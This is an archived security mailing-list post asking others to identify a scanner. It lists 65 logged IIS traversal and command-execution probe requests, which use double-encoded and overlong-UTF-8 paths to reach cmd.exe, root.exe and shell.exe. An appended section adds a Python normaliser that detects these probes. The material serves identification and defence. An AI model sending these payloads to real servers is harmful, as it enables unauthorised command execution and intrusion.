Hello,

Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?

Note that it also included: "User-Agent:.Mozilla/3.0. (compatible;.Indy.Library)....", from which my googling tells me that this attack/scanner is probably built using the Borland Delphi/C++ Builder suite.

I've so far received 3 of these from 2 different IP addresses. The first two were from a Comcast cable user. The last was from a Cox Communications IP.

Thanks,
Mark Embrich

0. Scan TCP 80
1. GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
2. GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
3. GET./_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
4. GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
5. GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
6. GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
7. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
8. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
9. GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
10. GET./_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
11. GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
12. GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
13. GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
14. GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
15. GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
16. GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
17. GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
18. GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
19. GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
20. GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
21. GET./msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
22. GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
23. GET./msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
24. GET./MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
25. GET./msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
26. GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
27. GET./msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
28. GET./msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
29. GET./msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
30. GET./msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
31. GET./msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
32. GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
33. GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
34. GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
35. GET./PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
36. GET./PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
37. GET./PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
38. GET./PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
39. GET./Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
40. GET./Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
41. GET./Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
42. GET./Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
43. GET./samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
44. GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
45. GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
46. GET./scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
47. GET./scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
48. GET./scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
49. GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
50. GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
51. GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
52. GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
53. GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
54. GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
55. GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
56. GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
57. GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
58. GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
59. GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
60. GET./scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
61. GET./scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
62. GET./scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
63. GET./scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
64. GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
65. GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..
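The 65 probes in the post are one family: the same "../winnt/system32/cmd.exe" (or root.exe / shell.exe) request re-spelled with double percent-encoding (%255c, %%35%63, %25%35%63, %252e, %252f) and with overlong UTF-8 forms of "/" and "\" (%c0%af, %c1%9c, %e0%80%af, up to the 6-byte %fc%80%80%80%80%af). A detector that matches the raw strings needs one signature per spelling and misses the next variant; one that normalizes the path first, the way the vulnerable server did, needs a single rule. The following is an added example, not code from the post or from any product named in it: a small Python normalizer plus classifier run over constructed request lines modelled on the probes above (spaces restored where the dump showed dots). The watch-list `WATCHED`, the reason labels and the sample lines are assumptions made for the example.

```python
"""Normalise request paths the way an over-permissive IIS of that era did
(percent-decode twice, fold overlong UTF-8 forms of '/' and '\\', treat '\\'
as '/') and flag requests that only reach '..' or a command interpreter after
that normalisation. Example code; sample input is constructed."""
import re
from urllib.parse import unquote_to_bytes

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/\d\.\d")
DOTDOT = re.compile(r"(?:^|/)\.\.(?:/|$)")
# Executables the quoted probes ask for (assumed watch-list; extend as needed).
WATCHED = ("/winnt/system32/cmd.exe", "/root.exe", "/shell.exe")


def decode_overlong(data: bytes) -> bytes:
    """Replace 2..6-byte UTF-8 sequences whose value fits in 7 bits with that
    ASCII byte (C0 AF -> '/', C1 9C -> '\\', E0 80 AF -> '/', ...).
    Anything that is not a well-formed lead+continuation run is left as-is,
    so malformed probe variants such as %c0%9v pass through unchanged."""
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if 0xC0 <= lead <= 0xFD:
            # Continuation-byte count and payload bits carried by the lead byte.
            if lead < 0xE0:
                cont, value = 1, lead & 0x1F
            elif lead < 0xF0:
                cont, value = 2, lead & 0x0F
            elif lead < 0xF8:
                cont, value = 3, lead & 0x07
            elif lead < 0xFC:
                cont, value = 4, lead & 0x03
            else:
                cont, value = 5, lead & 0x01
            tail = data[i + 1:i + 1 + cont]
            if len(tail) == cont and all(0x80 <= t <= 0xBF for t in tail):
                for t in tail:
                    value = (value << 6) | (t & 0x3F)
                if value < 0x80:  # overlong encoding of an ASCII character
                    out.append(value)
                    i += 1 + cont
                    continue
        out.append(lead)
        i += 1
    return bytes(out)


def normalize_path(raw_path: str, rounds: int = 2) -> str:
    """Percent-decode `rounds` times (catches %255c and %%35%63 style double
    encoding), fold overlong UTF-8, and treat backslash as a separator."""
    data = raw_path.encode("latin-1", errors="replace")
    for _ in range(rounds):
        data = unquote_to_bytes(data)
    data = decode_overlong(data)
    return data.decode("latin-1").replace("\\", "/")


def classify_request(line: str):
    """Return a finding dict for a suspicious request line, else None."""
    m = REQUEST_LINE.match(line)
    if not m:
        return None
    path = m.group("target").split("?", 1)[0]
    once = unquote_to_bytes(path)
    normalized = normalize_path(path)
    reasons = []
    if DOTDOT.search(normalized):
        reasons.append("traversal")
    if normalized.lower().endswith(WATCHED):
        reasons.append("command-shell")
    if not reasons:  # an encoding trick alone is not a finding (avoids false positives)
        return None
    # Supporting evidence: which evasion hid the path before normalisation.
    if unquote_to_bytes(once) != once:
        reasons.append("double-encoded")
    if decode_overlong(once) != once:
        reasons.append("overlong-utf8")
    return {"method": m.group("method"), "raw": path,
            "normalized": normalized, "reasons": reasons}


def scan_requests(lines):
    """Run the classifier over request lines and return the findings."""
    return [f for f in map(classify_request, lines) if f]


# Constructed sample, modelled on the probes quoted in the post.
SAMPLE_REQUESTS = [
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1",
    "GET /_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1",
    "GET /msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1",
    "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1",
    "GET /scripts/root.exe?/c+dir+c: HTTP/1.1",
    "GET /index.html HTTP/1.1",
    "GET /docs/%25complete.txt HTTP/1.1",  # literal '%' in a name: double-encoded but benign
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(f"{hit['raw']}\n  -> {hit['normalized']}  [{', '.join(hit['reasons'])}]")
```

Two design choices matter here. Decoding is done on bytes, not on str, because the interesting sequences (C0 AF, FC 80 80 80 80 AF) are not valid UTF-8 and a strict decoder would either reject or replace them; keeping them as bytes lets the overlong folder see the real values. And the encoding indicators are recorded only as supporting evidence once a traversal or watched executable is present, so a legitimate filename containing a literal percent sign does not page anyone.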
This archive was generated by hypermail 2b30 : Fri Apr 25 2003 - 11:43:04 PDT